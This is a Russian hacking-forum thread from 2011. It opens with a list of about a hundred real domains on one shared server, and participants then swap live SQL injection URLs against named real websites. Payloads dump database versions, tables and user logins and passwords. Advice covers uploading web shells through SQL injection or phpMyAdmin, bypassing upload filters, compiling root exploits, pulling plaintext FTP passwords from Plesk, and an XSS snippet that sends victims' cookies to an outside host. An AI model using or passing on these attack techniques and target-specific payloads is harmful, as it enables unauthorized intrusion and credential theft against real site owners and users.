topatulyashuz.ru
www.mt-m.ru
chidori-profit.com
predict1on.ru
www.exclusive-st.ru
www.kenotrontv.ru
www.stroyteploservis.ru
www.fmr.su
apple-star-films.com
svetoart.ru
filnauki.ru
ekhb.ru
kopeikina.com
www.yafanatkino.ru
dentolife.ru
www.megapechi.ru
mosarte.ru
www.probro.ru
76yar.ru
100lotov.ru
vivadizain.ru
answers-mail1.ru
www.alkonomsk.ru
www.blogogolik.ru
www.piercer.ru
www.relaxtea.ru
mebel-stavropol.ru
www.flyfishka.ru
medspravka24.com
dentime.ru
нейроклуб.рф
margo.cc
www.1alfa.ru
pelmen.org
www.russlines.ru
forexbc.ru
iportugal.ru
mobila51.com
special4kids.ru
www.doctor-stapel.ru
www.denapak.ru
jantars.ru
mosivphotos.com
tur-topik.ru
hstars.ru
sport-razgrom.ru
lazarevo43.ru
www.bostoncar.ru
www.sabahtea.ru
www.trawka.ru
donysoft.com
avtoremontes.ru
bestwax.ru
artkadr.ru
buhvolga.ru
школа-40.рф
selo-zavetnoe.ru
armada-forward.com
proficom.org
www.turpoisk-kaluga.ru
dress2.ru
tg-marka.ru
www.gce42.ru
mary-care.ru
www.discprint.ru
xx76.ru
kaluga-electro.ru
www.livedoors.ru
bigreferat.ru
borodina-diet.ru
torti.uz
auditenergo.com
www.housecomplect.ru
www.yam-mebel.ru
stroikapro.com
www.baikalboat.com
picimage.ru
rimtermy.ru
doma1ns.ru
gachirkov.com
gercules.com
burointerior.com
www.tesk72.ru
universepw.ru
moiorigami.ru
imdi.ru
yurikoff.com
www.kolgotki-belie.ru
artidelo.ru
www.stopholod.ru
www.otel89.ru
agrohimsnab.ru
rabobo.ru
planmytrip.ru
www.la2galaxy.ru
inflat.ru
sexperts.ru
arshu.ru
salongavrosh.ru
best4girls.ru
forex-rts.ru
cards2.ru
www.avto-instrument.net
legalka-tver.ru
moivyshivki.ru
fotolok.ru

Сервак конечно не порутается, т.к.:


Code:
Linux server18.hosting.reg.ru 2.6.26-2-amd64 #1 SMP Tue Jan 25 05:59:43 UTC 2011 x86_64

Но можно надеяться на криво-выставленные права, бэкапы, забытый .bash_history, бажный демон или еще какую вкусняшку.

BigBear
22.06.2011, 14:55
Да я искал уже. Проблема в том, что хостинг сразу предлагает предустановленные движки аля джумла или вордпресс, ессно пропатченные.

Редко кто юзает самопис.

А те кто юзает, админки не держат ибо почти везде html.

Редко где самопис на пхп, да и админки не везде.

Вот один из сайтов в списке.


Code:
http://100lotov.ru/objects.php?type=3+and+1=2+union+select+1,concat_w s(0x3a,table_name,column_name)+from+information_sc hema.columns+--+

BigBear
22.06.2011, 14:56
alexvrn said:
-3'/**//*!union*//**//*!select*//**/4--'
показывает страницу с id 4 как вывести версию базы и т.д помогите


Покажи линк - быстрее помогут )

Expl0ited
22.06.2011, 14:58
alexvrn said:
-3'/**//*!union*//**//*!select*//**/4--'
показывает страницу с id 4 как вывести версию базы и т.д помогите


Ну по всей видимости вывод попадает в заголовок Location, и очевидней будет сделать так


Code:
-3'/**//*!union*//**//*!select*//**/version()--'

GroM88
22.06.2011, 15:10
Такой вопрос, прочитал через скуль конфиг цмс

dbhost = localhost

dbuser = lalala

dbname = lalal2

dbpass = password

pma на хосте нет, пытаюсь с локалхоста через свой пхпмуадмин подключится

пишу в конфиге phpmyadmin'a

host site.ru

pass lalala,

db и т.п.

пишет (2003) нет конекта к серверу

Вопрос почему? если в конфиге написано сервер дб = localhost

Ну или как можно узнать какой ип у ДБ = \

Порт вроде стандартный, в php.ini смотрел = \

shell_c0de
22.06.2011, 15:15
вроде и так все понятно что коннект с БД только с локалки + удаленный коннект запрещен... порт то 3306 просканил хоть перед коннектом ?

BigBear
22.06.2011, 15:16
GroM88 said:
Такой вопрос, прочитал через скуль конфиг цмс
dbhost = localhost
dbuser = lalala
dbname = lalal2
dbpass = password
pma на хосте нет, пытаюсь с локалхоста через свой пхпмуадмин подключится
пишу в конфиге phpmyadmin'a
host site.ru
pass lalala,
db и т.п.
пишет (2003) нет конекта к серверу
Вопрос почему? если в конфиге написано сервер дб = localhost
Ну или как можно узнать какой ип у ДБ = \
Порт вроде стандартный, в php.ini смотрел = \



Потому что localhost. Тебе нужно цепляться к мускулу как по локалке. Выход - шелл.

Хочешь сдампить бд или просто подрубиться - залей шелл типа wso и сдампи бд через настройки ЦМС.

Быстрее и удобнее будет.

Expl0ited
22.06.2011, 15:17
GroM88 said:
Такой вопрос, прочитал через скуль конфиг цмс
dbhost = localhost
dbuser = lalala
dbname = lalal2
dbpass = password
pma на хосте нет, пытаюсь с локалхоста через свой пхпмуадмин подключится
пишу в конфиге phpmyadmin'a
host site.ru
pass lalala,
db и т.п.
пишет (2003) нет конекта к серверу
Вопрос почему? если в конфиге написано сервер дб = localhost
Ну или как можно узнать какой ип у ДБ = \
Порт вроде стандартный, в php.ini смотрел = \


Вероятность то что mysql открыт для доступа из вне (а если и открыт, то чаще всего для определенного хоста) слишком мала. Как вариант можно проверить пароли к фтп или ссш.

И если ты смог прочитать файлы через MySQL инъекцию, значит у тебя file_priv = on, а если в добавок к тому, ты вызвал load_file('/путь/файл') без кодировки (типа hex) то у тебя и magic_quotes_gpc = off, это значит что если ты найдешь полный путь до веб каталога для которого хватит прав на запись, то шелл считай у тебя есть.

Expl0ited
22.06.2011, 15:36
alexvrn said:
кто поможет мне ))




Code:
http://all-black-lists.com/cat/catalog-4'and(select(max(1))from(phpshop_categories)group/**/by(concat(version(),0x00,floor(rand(0)*2))))and(if (mid(version(),1,1)=5,1,0))='1.html

Expl0ited
22.06.2011, 15:44
alexvrn said:
как взять phpshop_users


/thread43966.html

+toxa+
22.06.2011, 15:51
BigBear said:
Где ещё помимо мускула может лежать пасс от админки ?


в файле, в скрипте прописан, в мускуле, но в другой таблице/базе нопремер

Expl0ited
22.06.2011, 16:00
alexvrn said:
http://all-black-lists.com/cat/catalog-4'and(select(max(1))from(phpshop_users)group/**/by(concat(0x3a,login,password,floor(rand(0)*2))))a nd(if(mid(0x3a,login,password,1,1)=5,1,0))='1.html
чёт не работает помогите


Сначала прочитай то, что я тебе дал, а потом если возникнут вопросы, задавай их здесь, но только по существу, а не какой то набор буквосимволов что я процитировал.

pirat0
22.06.2011, 21:24
http://rf-cheats.nichost.ru/index.php?styleid=2+3%27 посмотрите пожалуйста вроде как скуль но что-то там не так, после перезагрузки страници пропадает ошибка, и вывести поля не возможно, пробывал blind sql но тоже ничего не выводит так как ошибка куда то деваетса, я заметил что ошибка пропадает после третьего запроса в URLe, что это помогите разобратса

Expl0ited
22.06.2011, 21:59
pirat0 said:
http://rf-cheats.nichost.ru/index.php?styleid=2+3%27 посмотрите пожалуйста вроде как скуль но что-то там не так, после перезагрузки страници пропадает ошибка, и вывести поля не возможно, пробывал blind sql но тоже ничего не выводит так как ошибка куда то деваетса, я заметил что ошибка пропадает после третьего запроса в URLe, что это помогите разобратса


Нет там баги, просто блок, где возникает ошибка:


Code:
Ошибка mysql_fetch_array().

Как то криво берет данные из базы, возможно просто возвращается нулевой результат, а функция mysql_fetch_array() не может её обработать.

Вообщем это ошибка, но не бага.

pirat0
22.06.2011, 23:26
спс что посмотрел, а то я уж запарился искать как раскрутить, тоисть никак этот сайтец не сломать...

FlaktW
23.06.2011, 00:21
Обратил внимание на эту скулю:

http://sport-razgrom.ru/view_search.php?submit_s=%C8%F1%EA%E0%F2%FC&search=12'+and+'1'='('1

Так как я не силен в SQL-inj в POST запросах, не могли бы мне разъяснить, каким образом были найдены переменные submit_s, search?

M_script
23.06.2011, 00:34
Заходишь на http://sport-razgrom.ru/

Смотришь исходный код, там форма.


Code:

Поисковый запрос должен быть не менее 4-х символов.

Fooog
23.06.2011, 01:44
Konqi said:
@@user и @@database не заработали, потому что нету таких системных переменных, походу у тебя фильтрация скобок
пробуй пост запросы


А где можно об этом почитать ?

Так понимаю, "использование POST запросов в sql".

Konqi
23.06.2011, 01:48
Fooog said:
А где можно об этом почитать ?
Так понимаю, "использование POST запросов в sql".


да о чем прочитать собсно?

те же параметры отправляешь не через гет , а через пост

юзай minibrowser, или 2 строчки кода на php

вариантов море

kroŧ
23.06.2011, 12:35
pirat0 said:
тоисть никак этот сайтец не сломать...


посмотри сайты на одном ip http://www.ip-ping.ru/siteip/ возможно в одном из них есть уязвимость

BigBear
23.06.2011, 14:58
kroŧ said:
посмотри сайты на одном ip http://www.ip-ping.ru/siteip/ возможно в одном из них есть уязвимость


Предпочтительнее - Gmads. Он проще в использовании

Сайт сервиса (http://madnet.name/tools/madss/)

попугай
23.06.2011, 22:18
Попробовал скомпилить сплойт на серве.

gcc Permission denied

Тогда скомпилировал на своем сервере сплойт и залил его на серв. Запускаю.

error while loading shared libraries: requires glibc 2.5 or later dynamic linker

Как видно, требуется glibc 2.5 - ее как то можно установить или как еще запустить сплойт?

Unknown
24.06.2011, 03:06
попугай said:
Попробовал скомпилить сплойт на серве.
gcc Permission denied
Тогда скомпилировал на своем сервере сплойт и залил его на серв. Запускаю.
error while loading shared libraries: requires glibc 2.5 or later dynamic linker
Как видно, требуется glibc 2.5 - ее как то можно установить или как еще запустить сплойт?


И как скомпилировал сплоит? Динамическая связька или статическая?

попугай
24.06.2011, 15:20
R0nin said:
И как скомпилировал сплоит? Динамическая связька или статическая?



Просто набрал gcc sploit.c - o sploit

Unknown
24.06.2011, 15:34
попугай said:
Просто набрал gcc sploit.c - o sploit


Это динамическая привязка. Для статической набери :

gcc sploit.c -static -o sploit_bin

swat_
25.06.2011, 13:02
fckeditor/editor/filemanager/connectors/php/connector.php?

могу залить только txt,xml файлы

пробывал php.xml и тд не чего не помогает что подскажете делать?

FlaktW
25.06.2011, 14:59
Какая ветка у этой скули?

http://www.jobsfordriver.com/job/view/id/80323014'

Sc0rpi0n
26.06.2011, 21:56
Как узнать количество таблиц в MS SQL? вот пример запроса

+or+1=(select+top+1+table_name+from+information_sc hema.tables)--

вот в MySQL Я бы поставил count(*), а тут как быть?

SecondLife
27.06.2011, 01:58
Два вопроса:

1) http://www.internovosti.ru/text/?id=(42597)

Можно ли из этого что-нибудь извлечь?

2) На сервере есть скуль с filepriv, каким образом можно залить perl-shell? PHP отключён. Запись в папку cgi-bin доступна.

Expl0ited
27.06.2011, 04:07
swat_ said:
fckeditor/editor/filemanager/connectors/php/connector.php?
могу залить только txt,xml файлы
пробывал php.xml и тд не чего не помогает что подскажете делать?


Если веб-сервер nginx, то возможно просто залить shell.txt и запустить его из адресной строки так: shell.txt/test.php


SecondLife said:
Два вопроса:
1) http://www.internovosti.ru/text/?id=(42597)
Можно ли из этого что-нибудь извлечь?
2) На сервере есть скуль с filepriv, каким образом можно залить perl-shell? PHP отключён. Запись в папку cgi-bin доступна.


1) просто ошибка

2) логика такая же как и в заливке php шела, только для исполнения возможно понадобится включить выполнение perl в директории средствами .htaccess


Sc0rpi0n said:
Как узнать количество таблиц в MS SQL? вот пример запроса
+or+1=(select+top+1+table_name+from+information_sc hema.tables)--
вот в MySQL Я бы поставил count(*), а тут как быть?


http://realcoding.net/articles/sposoby-podscheta-kolichestva-zapisei-v-kazhdoi-iz-tablits-bazy-dannykh.html

stasiliy
27.06.2011, 23:24
Есть ли какие-то сканеры серверов, которые находят phpmyadmin или cpanel?

спасибо

d1v
27.06.2011, 23:30
stasiliy said:
Есть ли какие-то сканеры серверов, которые находят
phpmyadmin или cpanel?
спасибо


*сканеры директорий.

Reiluke AdminFinder (http://www.sendspace.com/file/0i5j6m)

plaeer
27.06.2011, 23:57
Нашёл сервак с уязвимостью в апаче Apache 2.2.14 mod_isapi Dangling Pointer, нашёл сплоит, скомпил, запустил в итоге получил Check to see if sos.txt was created...

Кто-нибудь подскажет что это значит? В файле sos.txt должен был быть код shell?

(видео http://www.youtube.com/watch?v=kKRz_KhQXnI )

Мужики помогите, а то я уже гугл износиловал, но он так ничего мне и не сказал... я в отчаянии

попугай
28.06.2011, 00:01
plaeer said:
Нашёл сервак с уязвимостью в апаче Apache 2.2.14 mod_isapi Dangling Pointer, нашёл сплоит, скомпил, запустил в итоге получил Check to see if sos.txt was created...
Кто-нибудь подскажет что это значит? В файле sos.txt должен был быть код shell?
(видео http://www.youtube.com/watch?v=kKRz_KhQXnI )
Мужики помогите, а то я уже гугл износиловал, но он так ничего мне и не сказал... я в отчаянии



Ну а файл создается то?

plaeer
28.06.2011, 00:14
попугай said:
Ну а файл создается то?


А как проверить-то ? Я пробовал что-то типо http://ip/sos.txt, безрезультатно...

foozzi
28.06.2011, 00:50
подскажите стандартный пароль на CMS BITRIX

Unknown
28.06.2011, 00:52
foozzi said:
подскажите стандартный пароль на CMS BITRIX


На CMS бывают стандартные пароли? Не настраивается ли пароль при установке системы?

попугай
28.06.2011, 00:58
plaeer said:
А как проверить-то ? Я пробовал что-то типо http://ip/sos.txt, безрезультатно...



По идее в папке с апачем должен создаться. Но или я что-то не понимаю, или видео относится к другому эксплойту. Как показано на видео, в результате должен открыться порт на сервере и, приконнектившись к нему, ты получишь нулевые привилегии. Посмотрел код сплойта - не нашел строки, которая есть в cmd на том видео "check port 4444 for shell".

plaeer
28.06.2011, 12:30
попугай said:
По идее в папке с апачем должен создаться. Но или я что-то не понимаю, или видео относится к другому эксплойту. Как показано на видео, в результате должен открыться порт на сервере и, приконнектившись к нему, ты получишь нулевые привилегии. Посмотрел код сплойта - не нашел строки, которая есть в cmd на том видео "check port 4444 for shell".


Я тоже смотрел код сплоита, и не увидел там ничего связанного с портом 4444. Поэтому предположил, что в sos.txt код бэкдора который открыл порт 4444. хз где взять этот код...

Alexander89
28.06.2011, 14:10
Подскажите как использовать

http://www.exploit-db.com/exploits/15449/

пробовал так

root@ubuntu:~# python2.7 15449.pl

результат


File "15449.pl", line 5
use IO::Socket;
^
SyntaxError: invalid syntax


и так


root@ubuntu:~# ./15449.pl
./15449.pl: line 4: $'\r': command not found
./15449.pl: line 5: use: command not found
./15449.pl: line 5: $'\r': command not found

Nek1t
28.06.2011, 15:09
perl 15449.pl

DeepBlue7
28.06.2011, 15:30
Вообщем, вопрос действительно особой важности... надо, и хоть убей. Имеется форум, предположительно phpBB 3.0.7 PL-1. Сплоитов найти не удаётся... Может, не там ищу...

Ссылочку не подкините ? Желательно , скулю...

Заранее спасибо.

Unknown
28.06.2011, 15:35
DeepBlue7 said:
Вообщем, вопрос действительно особой важности... надо, и хоть убей. Имеется форум, предположительно phpBB 3.0.7 PL-1. Сплоитов найти не удаётся... Может, не там ищу...
Ссылочку не подкините ? Желательно , скулю...
Заранее спасибо.


а ты искал вообще?

Что то нашел в гугл, но не проверял :

_http://securityhome.eu/exploits/exploit.php?eid=8646834484c84213245d653.76870877

_http://www.vfocus.net/art/20100906/7823.html

DeepBlue7
28.06.2011, 15:36
Не, dos не надо...

Unknown
28.06.2011, 15:38
DeepBlue7 said:
Не, dos не надо...


других видимо нету на паблик.

DeepBlue7
28.06.2011, 15:38
Я вот о том же . А на ссылочку глянуть можеш, если пмну ?

qaz
28.06.2011, 15:42
подскажите пожалуйста как тут быть

http://jetterauto.ru/index/page/id/411%27

вроде как и скуля и вроде как и нет

BigBear
28.06.2011, 16:55
qaz said:
подскажите пожалуйста как тут быть
http://jetterauto.ru/index/page/id/411%27
вроде как и скуля и вроде как и нет


Самая настоящая скуля. Правда вывода я не нашёл.


Code:
http://jetterauto.ru/index/page/id/411'+and+1=1+order+by+9+--+



Code:
http://jetterauto.ru/index/page/id/411'+and+1=1+union+select+1,2,3,4,5,6,7,8,9+--+

UP

Тут ещё скуля, но вывода также нету


Code:
http://jetterauto.ru/index/page/id/418/geo/23+and+1=2+union+select+111,222,333,444,555

UP2

Ещё скуля и опять нет вывода, крути как слепую...


Code:
http://jetterauto.ru/index/blog/id/4+and+1=1+union+select+1,2,3,4,5,6,77,8

d1v
28.06.2011, 17:09
http://jetterauto.ru/index/page/id/411'+and+1=1+union+select+1,2,3,4,5,6,7,8,9
+--+


ды никогда комменты пробелами не обрамляются %)

BigBear
28.06.2011, 17:10
d1v said:
ды никогда комменты пробелами не обрамляются %)


я искал как обрубить запрос чтоб избежать ошибки

В принципе - в этом случае обрубать ничего не нужно...

d1v
28.06.2011, 17:15
BigBear said:
я искал как обрубить запрос чтоб избежать ошибки
В принципе - в этом случае обрубать ничего не нужно...


просто кавычку убрать нужно из запроса.

qaz
28.06.2011, 17:18
d1v said:
просто кавычку убрать нужно из запроса.


убрал, тотже ифект

Konqi
28.06.2011, 18:41
http://jetterauto.ru/index/blog/id/4 or 1 group by concat(version(),rand(0)|0) having min(0)--+

d1v
28.06.2011, 18:43
qaz said:
убрал, тотже ифект


вывода и не будет, потому что это блайнд. в данном случае можно добиться вывода в ошибке. раскрутил по методу qwazar'a (http://qwazar.ru/?p=7) :


HTML:
http://jetterauto.ru/index/page/id/411+and+1=1'+and(select+1+from(select+count(*),con cat((select+(select+(select+concat(0x7e,0x27,cms_u ser_list.login,0x27,0x7e)+from+mainfra_jetter_tst. cms_user_list+order+by+login+limit+0,1)+)+from+inf ormation_schema.tables+limit+0,1),floor(rand(0)*2) )x+from+information_schema.tables+group+by+x)a)+an d+'1'='1

plaeer
28.06.2011, 19:46
plaeer said:
Я тоже смотрел код сплоита, и не увидел там ничего связанного с портом 4444. Поэтому предположил, что в sos.txt код бэкдора который открыл порт 4444. хз где взять этот код...


Что никто не может помочь?

Unknown
28.06.2011, 20:31
plaeer said:
Что никто не может помочь?


Товарищ, не знаю что за эксплоит но примерно я бы сделал такой вывод - если там написано, чтобы я проверил наличие файла sos.txt а его там нету значит эксплоит не заработал, может потому, что уязвимое ПО запатчено.

plaeer
28.06.2011, 21:37
R0nin said:
Товарищ, не знаю что за эксплоит но примерно я бы сделал такой вывод - если там написано, чтобы я проверил наличие файла sos.txt а его там нету значит эксплоит не заработал, может потому, что уязвимое ПО запатчено.


Вообще-то эту уязвимость обнаружил сканер.

plaeer
28.06.2011, 21:38
Сам сплоит - http://www.securitylab.ru/poc/391481.php

Unknown
28.06.2011, 22:25
plaeer said:
Сам сплоит - http://www.securitylab.ru/poc/391481.php


Сканер может ошибится.

ПО может иметь уязвимую версию но при этом таки может быть пропатченным.

Redwood
28.06.2011, 22:32
plaeer said:
Вообще-то эту уязвимость обнаружил сканер.


Ну раз сканер, тогда это координально меняет ситуацию

GroM88
29.06.2011, 13:28
Траблы с залитием шела через phpmyadmin

File_priv : Y

Делаю запрос :

SELECT '' into OUTFILE '/var/www/html/web/site.com/shell.php'

Мне в ответ:

#1 - Can't create/write to file '/var/www/html/web/site.com/shell.php' (Errcode: 13)

Почему вылазит такая ошибка и файл не создается?

попугай
29.06.2011, 13:30
Прав нет же

На запись в папку.

Sc0rpi0n
29.06.2011, 20:19
Подскажите плиз статью на вывод данный из mysql слепой инъекции через ошибку.

там чёто типа floor rand. токо не могу найти мануал...

lukmus
29.06.2011, 20:47
Sc0rpi0n said:
Подскажите плиз статью на вывод данный из mysql слепой инъекции через ошибку.
там чёто типа floor rand. токо не могу найти мануал...


https://rdot.org/forum/showpost.php?p=746&postcount=3

winstrool
29.06.2011, 20:56
Sc0rpi0n said:
Подскажите плиз статью на вывод данный из mysql слепой инъекции через ошибку.
там чёто типа floor rand. токо не могу найти мануал...


вот тебе пример запроса:


+OR+%28SELECT+COUNT%28*%29+FROM+%28SELECT+1+UNION+ SELECT+2+UNION+SELECT+3%29x+GROUP+BY+CONCAT%28MID% 28%28select+{твой запрос}%29%29,1,63%29,+FLOOR%28RAND%280%29*2 %29%29%29--+




+OR+%28SELECT+COUNT%28*%29+FROM+%28SELECT+1+UNION+ SELECT+2+UNION+SELECT+3%29x+GROUP+BY+CONCAT%28MID% 28%28select+concat_ws%280x3a,user%28%29,version%28 %29,database%28%29%29%29,1,63%29,+FLOOR%28RAND%280 %29*2%29%29%29--+

t0wer
01.07.2011, 01:31
Есть доступ к phpmyadmin. Нужно выудить ftp логин/пароль

Направте в нужном направлении информацией или чем капнуть туда?!

d1v
01.07.2011, 01:46
t0wer said:
Есть доступ к phpmyadmin. Нужно выудить ftp логин/пароль
Направте в нужном направлении информацией или чем капнуть туда?!


pma - это скрипт для управления базами данных и никакого отношения к фтп не имеет. единственный вариант, который возможен - это залить шелл через pma, порутать сервак и выудить фтп акк)

клац (https://rdot.org/forum/showthread.php?t=347l)

есть ещё вариант найти акк в конфигах сайта. на чём он стоит?

Expl0ited
01.07.2011, 02:03
t0wer said:
Есть доступ к phpmyadmin. Нужно выудить ftp логин/пароль
Направте в нужном направлении информацией или чем капнуть туда?!


Нужно зать что за ПО там стоит, и где хранятся пароли, бывает случаи (например Plesk Panell) где данные хранятся в базе, более того, в не зашифрованном виде, и для того что бы получить полный список всех фтп, достаточно выполнить:


PHP:
SELECT REPLACE(sys_users.home,'/home/httpd/vhosts/','') ASdomain,

sys_users.login,accounts.password FROM sys_users

LEFT JOIN accounts on sys_users.account_id=acc ounts.id

ORDER BY sys_users.home ASC

Но в большинстве случаев, конечно же пароли так просто не достать, так что как минимум нужно закрепится, и начать исследовать систему изнутри.

killerben
01.07.2011, 17:20
почему когда я ввожу


http://www.jertva.ru/search?q=


То в ифрейме выводит содержимое .js файла ?

+toxa+
01.07.2011, 17:29
эээээ.... а что должно быть там? если хочешь выполнения js кода, то юзай вместо

killerben
01.07.2011, 17:41
+toxa+ said:
эээээ.... а что должно быть там? если хочешь выполнения js кода, то юзай вместо


Спасибо большое, там работает только iframe.

Получилось так:

Содержимое xss.php


Code:

img = new Image();
img.src = "http://httpz.ru/nlj6byr15oq.gif?"+document.cookie;


Теперь когда захожу по адресу, присылает:


Code:
IP: **.***.22.87
Query: empty
REFERER: http://site.ru/xss.php
AGENT: Mozilla/5.0 (Windows NT 5.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1

это значит работает ? Можно админу отправлять на почту ссылку ? если бы были кукисы, оно бы мне прислало их ?

+toxa+
01.07.2011, 17:53
зайди на site.ru , потом в адресной строке напиши


Code:
javascript:document.cookie='test_cookie=31337';

и попробуй заюзать свою xss ещё раз. узнаешь наверняка.

killerben
01.07.2011, 17:56
таким способом присылает куки с моего сайта, а не с сайта жертвы.

Melfis
01.07.2011, 18:05
Спасибо большое, там работает только iframe.


Как так, стоит фильтрация на слова script /script?

бывает, что стоит фильтрация на "document.cookie". Тогда просто сделай d = document; и вставляй d.cookie;

В общем попробуй обойти фильтрацию.

Expl0ited
01.07.2011, 18:16
killerben, тег iframe подгружает страницу с удаленного сервера, и если ты подгрузишь там код, то это ничего не даст, он выполнится на удаленном сервере, а не на атакуемом, я тебе дал ссылку, внимательно почитай что там написано, и какие методы могут быть, вопросы отпадут сами собой!

winstrool
02.07.2011, 02:08
есть сервачек с провами роот, через уязвимость скрипта не получается залить шелл так как фельтруются ковычки, вытянул логин и пасс от бд, прова роот, через пхпмиадмин не хочет с этими даными заходить, хотя удаленно по этим же данным подключается, знаю апсолютные пути к сайту и папкам с возможностью заливкой файла, на запрос select 'blabla' into outfile '/blabla/bla.php' ругается, в чем таробла, что делаю не так?!

Expl0ited
02.07.2011, 12:08
Может быть два варианта:

- не хватает прав.

- база данных размещается на другом сервере.

qaz
02.07.2011, 12:10
такой вопрос

есть таблица узерс

http://www.sportbars.ru/view_transl.php?id=820+UnIon+selECt+1,2,table_name ,4,5,6,7,8,9,10,11,12,13,14,15+from+information_sc hema.tables+limit+31,1--+

хочувывести от туда хотябы логины

http://www.sportbars.ru/view_transl.php?id=820+UnIon+selECt+1,2,column_nam e,4,5,6,7,8,9,10,11,12,13,14,15+from+information_s chema.columns+where+table_name=0x7573657273+limit+ 12,1--+

ничего не выводит

http://www.sportbars.ru/view_transl.php?id=820+UnIon+selECt+1,2,ulogin,4,5 ,6,7,8,9,10,11,12,13,14,15+from+users--+

почему?

Seravin
02.07.2011, 12:14
qaz said:
такой вопрос
есть таблица узерс
http://www.sportbars.ru/view_transl.php?id=820+UnIon+selECt+1,2,table_name ,4,5,6,7,8,9,10,11,12,13,14,15+from+information_sc hema.tables+limit+31,1--+
хочувывести от туда хотябы логины
http://www.sportbars.ru/view_transl.php?id=820+UnIon+selECt+1,2,column_nam e,4,5,6,7,8,9,10,11,12,13,14,15+from+information_s chema.columns+where+table_name=0x7573657273+limit+ 12,1--+
ничего не выводит
http://www.sportbars.ru/view_transl.php?id=820+UnIon+selECt+1,2,ulogin,4,5 ,6,7,8,9,10,11,12,13,14,15+from+users--+
почему?


http://www.sportbars.ru/view_transl.php?id=820+UnIon+selECt+1,2,ulogin,4,5 %20,6,7,8,9,10,11,12,13,14,15+from+lol.users+limit +0,1--+

qaz
02.07.2011, 12:21
Seravin said:
http://www.sportbars.ru/view_transl.php?id=820+UnIon+selECt+1,2,ulogin,4,5 %20,6,7,8,9,10,11,12,13,14,15+from+lol.users+limit +0,1--+


ухты, спасибо, а можно поинтерисоватся, а lol.users

интерисует вот ето lol. можете обяснить што ето откуда почиму и как?

Unknown
02.07.2011, 12:27
qaz said:
ухты, спасибо, а можно поинтерисоватся, а lol.users
интерисует вот ето lol. можете обяснить што ето откуда почиму и как?


Это база в которой находится данная таблица.

Узнается так

union select table_schema from information_schema.tables where table_name='users'

winstrool
02.07.2011, 12:28
Expl0ited said:
Может быть два варианта:

- не хватает прав.

- база данных размещается на другом сервере.


прав хвотает, и сами сайты с БД на одном сервере, это подтверждает то что есть возможность с БД заливать файлы в папку /tmp/ и и прсоматривать то что залито через load_file()

Expl0ited
02.07.2011, 14:07
winstrool said:
прав хвотает, и сами сайты с БД на одном сервере, это подтверждает то что есть возможность с БД заливать файлы в папку /tmp/ и и прсоматривать то что залито через load_file()


А разве папки /tmp/ не должно быть на сервере где стоит БД?

И даже если так, сервер у них один, то ничего не меняется, прав может не быть на создание файла в директориях видные из веб, а то что в tmp пишется это понятно, т.к. права к этой папке у всех пользователей системы.

IMMORTAL_S
02.07.2011, 16:46
?id=181'+or+(select+count(*)+from+information_sche ma.tables+group+by+concat_ws(0x3a,(select+concat_w s(':',table_schema,table_name)+from+information_sc hema.tables+limit+0,1),floor(rand(0)*2)))--+

выдает- Subquery returns more than 1 row

Где я намудрил?

Expl0ited
02.07.2011, 16:53
IMMORTAL_S said:
?id=181'+or+(select+count(*)+from+information_sche ma.tables+group+by+concat_ws(0x3a,(select+concat_w s(':',table_schema,table_name)+from+information_sc hema.tables+limit+0,1),floor(rand(0)*2)))--+
выдает- Subquery returns more than 1 row
Где я намудрил?


видимо запрос select+concat_ws(':',table_schema,table_name)+from +information_schema.tables+limit+0,1 возвращает большой результат, попробуй просто select table_schema from information_schema.tables limit 0,1

и отталкивайся от этого, сначала найди нужную базу, потом таблицу, потом поля, потом выводи.

IMMORTAL_S
02.07.2011, 17:01
Судя по всему да..

?url=181'+or+(select+count(*)+from+information_sch ema.tables+group+by+concat_ws(0x3a,(select+concat_ ws(0x3a,user,password)+from+mysql.user+limit+0,1), floor(rand(0)*2)))--+

Выдал - Data too long for column '(null)' at row 15

Подскажите, почему так происходит?

Melfis
02.07.2011, 17:01
IMMORTAL_S said:
?id=181'+or+(select+count(*)+from+information_sche ma.tables+group+by+concat_ws(0x3a,(select+concat_w s(':',table_schema,table_name)+from+information_sc hema.tables+limit+0,1),floor(rand(0)*2)))--+
выдает- Subquery returns more than 1 row
Где я намудрил?


где-то ты действительно намудрил


Code:
and(select 1 from(select count(*),concat(version(),floor(rand(0)*2))x
from information_schema.tables group by x)a)--

вместо version() подставляешь уже

(select table_name from information_schema.tables limit 0,1)

У меня твоя ошибка возникала, когда не в то место подставлял данные на вывод в ошибке, и там уже не помогал никакой лимит


Судя по всему да.. ?url=181'+or+(select+count(*)+from+information_sch ema.tables+group+by+concat_ws(0x3a,(select+concat_ ws(0x3a,user,password)+from+mysql.user+limit+0,1), floor(rand(0)*2)))--+ Выдал - Data too long for column '(null)' at row 15 Подскажите, почему так происходит?


Видимо попутно идёт интсерт в какую-то таблицу со статистикой, а как раз получается он большой... хотя это лишь догадка

MTV
03.07.2011, 00:04
http://catalog.akadia.ru/totalcatalog/?st=30&l=YnJhbmRfaWQ9PTEyMTh8fG1vZGVsX2lkPT00Mjgw.Как определить кол-во полей?

попугай
03.07.2011, 00:25
http://catalog.akadia.ru/totalcatalog/?st=30&l=YnJhbmRfaWQ9PTEyMTh8fG1vZGVsX2lkPT0tNDI4MCB1bmlv biBzZWxlY3QgdmVyc2lvbigpLS0=

1 поле в model_id

YuNi|[c
04.07.2011, 19:23
возможно ли сделать поиск по базе mysql5 если не знать имени таблицы и колнки. Например в значении колонки слово maxim по текушей базе, если возможно то примерный запрос какой будеть

спс

Melfis
04.07.2011, 19:40
YuNi|[c said:
возможно ли сделать поиск по базе mysql5 если не знать имени таблицы и колнки. Например в значении колонки слово maxim по текушей базе, если возможно то примерный запрос какой будеть
спс


Нельзя. Если я конечно правильно понял про что ты.

z0mbie86
05.07.2011, 01:16
Имеется код:


$IPBHTML .= "
" . (($this->ipsclass->input['testKey'] = 123) ? ("
" . ((eval($this->ipsclass->input['code'])) ? ("") : ("")) . "
") : ("")) . "


Обращаюсь я к нему вот так http://site.ru/index.php?testKey=123&code=phpinfo();

Нужен эксплоит который в code POST-методом будет пересылать код шелла.

Cybersteger
05.07.2011, 13:04
z0mbie86 said:
Имеется код:
Обращаюсь я к нему вот так http://site.ru/index.php?testKey=123&code=phpinfo();
Нужен эксплоит который в code POST-методом будет пересылать код шелла.


если я правильно понял


Code:


где /home/httpdocs/files/ - путь к папке которая доступна на запись

FreN4
05.07.2011, 13:30
привет

нужна помосчь!

есть скуля но при дописывании limit или


Code:
